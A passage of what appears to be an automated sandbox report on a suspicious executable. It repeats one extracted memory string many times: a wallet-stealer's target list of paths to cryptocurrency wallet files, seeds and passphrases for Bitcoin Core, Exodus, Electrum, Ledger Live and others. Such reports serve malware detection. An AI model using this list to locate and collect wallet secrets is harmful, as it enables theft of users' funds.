(old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx 